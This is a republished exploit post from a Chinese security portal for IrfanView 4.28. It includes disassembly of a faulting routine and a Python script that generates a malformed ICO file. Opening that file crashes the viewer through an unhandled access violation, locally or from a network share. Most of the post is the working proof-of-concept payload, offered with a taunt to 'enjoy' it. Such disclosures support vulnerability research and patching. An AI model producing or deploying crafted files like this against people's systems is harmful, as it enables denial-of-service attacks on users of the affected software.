首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
IrfanView 4.28 - ICO Without Transparent Colour DoS & RDoS
来源:www.hackers.org.pl 作者:BraniX 发布时间:2011-04-11  

# done by BraniX <branix@hackers.org.pl>
# www.hackers.org.pl
# found: 2011.04.07
# published: 2011.04.10
# tested on: Windows XP SP3 Home Edition
# tested on: Windows XP SP3 Professional

# App: IrfanView 4.28
# App Url: http://www.irfanview.com
# i_view32.exe MD5: c6d9383c4119a59aad70dbc4a974b8b4

# DoS is caused by not handled Access Violation Exception in module i_view32.exe

# It can be triggered from:
# Local: C:\Without Transparent Colour - DoS.ico
# Remote: \\MySecretServer\Without Transparent Colour - DoS.ico

# 004162D0    8B4424 04       MOV EAX,DWORD PTR SS:[ESP+4]
# 004162D4    B2 80           MOV DL,80
# 004162D6    8AC8            MOV CL,AL
# 004162D8    53              PUSH EBX
# 004162D9    80E1 07         AND CL,7
# 004162DC    D2EA            SHR DL,CL
# 004162DE    8B4C24 0C       MOV ECX,DWORD PTR SS:[ESP+C]
# 004162E2    C1E8 03         SHR EAX,3
# 004162E5    8A1C08          MOV BL,BYTE PTR DS:[EAX+ECX]             ; Invalid address -> Access Violation when reading
# 004162E8    22D3            AND DL,BL
# 004162EA    5B              POP EBX
# 004162EB    F6DA            NEG DL
# 004162ED    1BD2            SBB EDX,EDX
# 004162EF    F7DA            NEG EDX
# 004162F1    8BC2            MOV EAX,EDX
# 004162F3    C3              RETN

filepath = "C:\\Without Transparent Colour - DoS.ico"
f = open(filepath, "wb")
poc = '\x00\x00\x01\x00\x01\x00\x0B\x0D\x00\x00\x01\x00\x18\x00\x30\x02\x00\x00\x16\x00\x00\x00\x28\x00\x00\x00\xFF\x00\x00\x00\x1A\x00\x00\x00\x01\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1E\x17\x14\x1C\x23\x14\x1C\x23\x14\x2D\x26\x16\x1C\x23\x14\x1C\x23\x14\x1C\x23\x14\x35\x27\x24\x36\x33\x35\x2C\x33\x4B\x2C\x33\x4B\x00\x00\x00\x1C\x23\x14\x1C\x23\x14\x1C\x23\x14\x1C\x23\x14\x1C\x23\x14\x3F\x39\x48\x48\x54\x67\x33\x29\x34\x36\x33\x35\x2C\x33\x4B\x44\x46\x65\x00\x00\x00\x36\x33\x35\x56\x58\x76\x64\x67\x87\x35\x44\x4D\x1E\x17\x14\x64\x67\x87\x65\x78\x96\x35\x27\x24\x36\x33\x35\x2C\x33\x4B\x48\x54\x67\x00\x00\x00\x27\x34\x33\x65\x78\x96\x65\x78\x96\x48\x54\x67\x56\x55\x67\x77\x76\x98\x44\x44\x56\x25\x24\x24\x3F\x39\x48\x44\x44\x56\x48\x54\x67\x00\x00\x00\x44\x44\x56\x44\x46\x65\x36\x33\x35\x67\x66\x77\x65\x59\x90\x67\x66\x99\x56\x55\x67\x25\x24\x24\x3F\x39\x48\x44\x44\x56\x44\x46\x65\x00\x00\x00\x77\x69\xCA\x56\x58\x76\x44\x35\x2F\x77\x76\x98\x76\x6B\x98\x77\x76\x98\x34\x46\x2E\x25\x26\x37\x2C\x33\x4B\x3F\x39\x48\x48\x54\x67\x00\x00\x00\x65\x59\x90\x44\x44\x56\x55\x49\x65\x51\x47\x46\x55\x56\x58\x34\x46\x2E\x36\x33\x35\x36\x33\x35\x2C\x33\x4B\x2C\x33\x4B\x47\x56\x76\x00\x00\x00\x75\x69\x88\x55\x49\x65\x52\x55\x8B\x46\x43\x44\x36\x33\x35\x44\x44\x56\x44\x44\x56\x3F\x39\x48\x3F\x39\x48\x3F\x39\x48\x56\x58\x76\x00\x00\x00\x67\x66\x77\x44\x44\x56\x55\x49\x65\x55\x49\x65\x56\x58\x76\x65\x59\x90\x55\x49\x65\x3F\x39\x48\x33\x29\x34\x3F\x39\x48\x56\x58\x76\x00\x00\x00\x55\x49\x65\x55\x49\x65\x55\x49\x65\x65\x59\x90\x67\x66\x99\x65\x59\x90\x55\x49\x65\x3F\x39\x48\x33\x29\x34\x44\x44\x56\x64\x67\x87\x00\x00\x00\x4F\x49\x56\x55\x49\x65\x55\x49\x65\x56\x55\x67\x65\x59\x70\x64\x67\x87\x56\x58\x76\x3F\x39\x48\x2C\x33\x4B\x44\x46\x65\x54\x69\x8C\x00\x00\x00\x55\x49\x65\x55\x49\x65\x55\x49\x65\x55\x49\x65\x65\x59\x90\x65\x59\x90\x55\x49\x7A\x3F\x39\x48\x3F\x39\x48\x56\x58\x76\x65\x78\x96\x00\x00\x00\x65\x59\x90\x56\x58\x76\x52\x55\x8B\x65\x59\x90\x6C\x58\xB0\x67\x66\x99\x52\x55\x8B\x3F\x39\x48\x2C\x33\x4B\x56\x58\x76\x77\x8F\xAB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
f.write(poc)
f.close()

print "Done, 1 file generated on 'C:\\' ..."
print "Open this file in IrfanView 4.28 and enjoy ;)"


   


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IrfanView 4.28 - ICO With Tran
·MikeyZip 1.1 .ZIP File Buffer
·Libmodplug ReadS3M Stack Overf
·Drupal 7.0 Shell Execution
·Microsoft Windows xp AFD.sys L
·AOL Desktop 9.6 RTX Buffer Ove
·Joomla! com_virtuemart <= v1.1
·ManageEngine Applications Mana
·Real Networks Arcade Games Stu
·Synergy 1.4 Protocol Cleartext
·Wamp Webserver 2.1 File Downlo
·Graugon Forum 1.3 SQL Injectio
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved